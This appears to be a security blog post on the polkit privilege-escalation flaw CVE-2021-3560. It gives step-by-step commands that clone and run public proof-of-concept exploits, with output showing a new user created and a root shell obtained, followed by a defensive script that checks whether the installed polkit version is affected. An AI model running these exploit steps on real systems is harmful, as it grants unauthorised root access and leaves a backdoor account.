[CVE-2021-3560] Polkit

polkit is a system service that is installed by default on many Linux distributions. It is used by systemd, so every Linux distribution that uses systemd also uses polkit.

CVE-2021-3560 is an authentication-bypass vulnerability in polkit that allows an ordinary, unprivileged user to invoke privileged methods over DBus.

Exploitation steps

# Method 1:
# accountsservice and gnome-control-center must be installed
➜ git clone https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
➜ cd CVE-2021-3560-Polkit-Privilege-Esclation
➜ chmod +x poc.sh
➜ ./poc.sh

# Method 2:
➜ git clone https://github.com/Almorabea/Polkit-exploit
➜ cd Polkit-exploit
➜ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse 
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit 
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# whoami
root
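Before running either PoC, or when triaging a host, the first thing to establish is whether the installed polkit falls in the affected range. The script below is an added example (not part of this post or of either PoC repository): upstream, the bug was introduced in polkit 0.113 and fixed in 0.119, so it flags 0.113 through 0.118. It assumes `pkaction --version` prints `pkaction version X.Y`, and it only knows upstream version numbers, so it is a hint, not proof.

```shell
#!/bin/sh
# Added example: classify a polkit version against the CVE-2021-3560
# upstream affected range (0.113 <= version <= 0.118).
# Caveat: distributions backport code in both directions. Ubuntu 20.04,
# for instance, shipped a 0.105-based package that was still affected,
# so always confirm against your distro's advisory.

# polkit_affected VERSION -> prints "affected" or "not-affected"
polkit_affected() {
    ver="$1"
    major=$(printf '%s' "$ver" | cut -d. -f1)
    # second component, with any Debian-style suffix such as "-1" stripped
    minor=$(printf '%s' "$ver" | cut -d. -f2 | sed 's/[^0-9].*//')
    if [ "$major" = "0" ] && [ "$minor" -ge 113 ] && [ "$minor" -le 118 ]; then
        echo affected
    else
        echo not-affected
    fi
}

# installed_polkit_version -> third word of "pkaction version 0.105"
installed_polkit_version() {
    pkaction --version 2>/dev/null | awk '{print $3}'
}

main() {
    v=$(installed_polkit_version)
    if [ -z "$v" ]; then
        echo "pkaction not found; polkit may not be installed"
        return 2
    fi
    echo "polkit $v: $(polkit_affected "$v") (upstream range only)"
}

# Run the live check only when invoked as: sh check_polkit.sh --check
if [ "$1" = "--check" ]; then
    main
fi
```

Newer polkit releases use single-number versions (121, 123, ...), which the function reports as not affected.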

References

  • https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
  • https://github.com/Almorabea/Polkit-exploit
  • https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
This post is licensed under CC BY 4.0 by the author.